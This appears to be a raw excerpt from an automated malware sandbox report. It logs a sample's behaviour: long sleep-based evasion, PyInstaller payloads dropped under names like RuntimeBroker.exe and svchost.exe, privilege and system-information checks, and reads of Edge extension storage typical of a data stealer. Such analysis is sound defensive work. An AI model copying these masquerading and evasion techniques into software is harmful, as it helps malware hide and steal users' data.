Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\cscript.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5625	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 356	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7574	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1100	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 2835	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 3095	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Window / User API: threadDelayed 3175
Source: C:\ProgramData\Microsoft\based.exe	Window / User API: threadDelayed 3076
Source: C:\Windows\System32\cmd.exe	Window / User API: threadDelayed 3218
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 3184
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2798
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1675
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2062
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 3448
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3015
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 546
Source: C:\Windows\System32\cmd.exe	Window / User API: threadDelayed 3412
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 3313
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2409

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ZlZjQqUm.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76842\python310.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KBGuTvrT.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76842\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\moRxsLqL.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IIrMizFV.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77042\unicodedata.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77042\_decimal.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76842\_decimal.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76842\_hashlib.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76842\select.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76842\_lzma.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77042\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68642\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RhnciprG.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68642\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\nCAYcgzI.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68642\select.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77042\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68642\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BhVFUouj.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\kuPhBLMV.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77042\python310.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77042\rar.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PyvtgeZE.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\rtqOkdzB.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68642\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NuVdFscS.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iGLZQxQX.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\pYJguVIM.log	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68642\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XSgjglWp.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vosgrJpv.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\dTtanABj.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77042\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\shuXVqvz.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FOowrzbf.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DLBNVQXk.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76842\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FGEdMQBa.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gEYquOMc.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77042\_ctypes.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76842\_socket.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77042\_bz2.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77042\_queue.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68642\_lzma.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77042\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68642\python310.dll	Jump to dropped file
Source: C:\ProgramData\setup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PGfLLOAK.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77042\_socket.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI77042\_hashlib.pyd	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_5-17040
Source: C:\ProgramData\Microsoft\hacn.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	API coverage: 6.4 %
Source: C:\Windows\System32\cmd.exe	API coverage: 6.9 %

Source: C:\Users\user\Desktop\87Bym0x4Fy.exe TID: 7012	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7116	Thread sleep count: 5625 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7132	Thread sleep count: 356 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7284	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7092	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7160	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7184	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe TID: 7272	Thread sleep count: 320 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe TID: 7272	Thread sleep count: 169 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8256	Thread sleep count: 3095 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8256	Thread sleep time: -3095000s >= -30000s	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe TID: 8260	Thread sleep count: 3175 > 30
Source: C:\ProgramData\Microsoft\based.exe TID: 8260	Thread sleep time: -3175000s >= -30000s
Source: C:\ProgramData\Microsoft\based.exe TID: 8292	Thread sleep time: -3076000s >= -30000s
Source: C:\Windows\System32\cmd.exe TID: 8336	Thread sleep count: 3218 > 30
Source: C:\Windows\System32\cmd.exe TID: 8336	Thread sleep time: -3218000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8136	Thread sleep count: 2798 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1196	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7360	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7080	Thread sleep count: 1675 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7416	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7244	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1184	Thread sleep count: 2062 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1308	Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\SIHClient.exe TID: 7880	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe TID: 1888	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1208	Thread sleep count: 3015 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8188	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2944	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6808	Thread sleep count: 546 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6896	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\cmd.exe TID: 8308	Thread sleep count: 3412 > 30
Source: C:\Windows\System32\cmd.exe TID: 8308	Thread sleep time: -3412000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4336	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7620	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\cscript.exe TID: 8432	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\SIHClient.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\SIHClient.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\SIHClient.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\SIHClient.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\ProgramData\Microsoft\based.exe	Last function: Thread delayed
Source: C:\ProgramData\Microsoft\based.exe	Last function: Thread delayed
Source: C:\ProgramData\Microsoft\based.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\cscript.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\cscript.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B0579B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	5_2_00007FF72B0579B0
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B0585A0 FindFirstFileExW,FindClose,	5_2_00007FF72B0585A0
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 5_2_00007FF72B070B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	5_2_00007FF72B070B84
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B0585A0 FindFirstFileExW,FindClose,	7_2_00007FF72B0585A0
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B070B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	7_2_00007FF72B070B84
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Code function: 7_2_00007FF72B0579B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	7_2_00007FF72B0579B0
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B4C4A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	13_2_00B4C4A8
Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe	Code function: 13_2_00B5E560 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	13_2_00B5E560
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55E7F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	15_2_00007FF6D55E7F4C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55E7F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	15_2_00007FF6D55E7F4C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55F1FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	15_2_00007FF6D55F1FE4
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 15_2_00007FF6D55D8B00 FindFirstFileExW,FindClose,	15_2_00007FF6D55D8B00
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_0055A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	21_2_0055A69B
Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe	Code function: 21_2_0056C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	21_2_0056C220
Source: C:\ProgramData\svchost.exe	Code function: 29_2_0066A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	29_2_0066A69B
Source: C:\ProgramData\svchost.exe	Code function: 29_2_0067C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	29_2_0067C220
Source: C:\Windows\System32\cmd.exe	Code function: 32_2_0000023225B2DCE0 FindFirstFileExW,	32_2_0000023225B2DCE0
Source: C:\Windows\System32\tasklist.exe	Code function: 38_2_0000016716C6DCE0 FindFirstFileExW,	38_2_0000016716C6DCE0
Source: C:\Windows\System32\tasklist.exe	Code function: 39_2_00000245E891DCE0 FindFirstFileExW,	39_2_00000245E891DCE0

Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe

Code function: 13_2_00B60B80 VirtualQuery,GetSystemInfo,

13_2_00B60B80

Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\cscript.exe	Thread delayed: delay time: 922337203685477

Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def

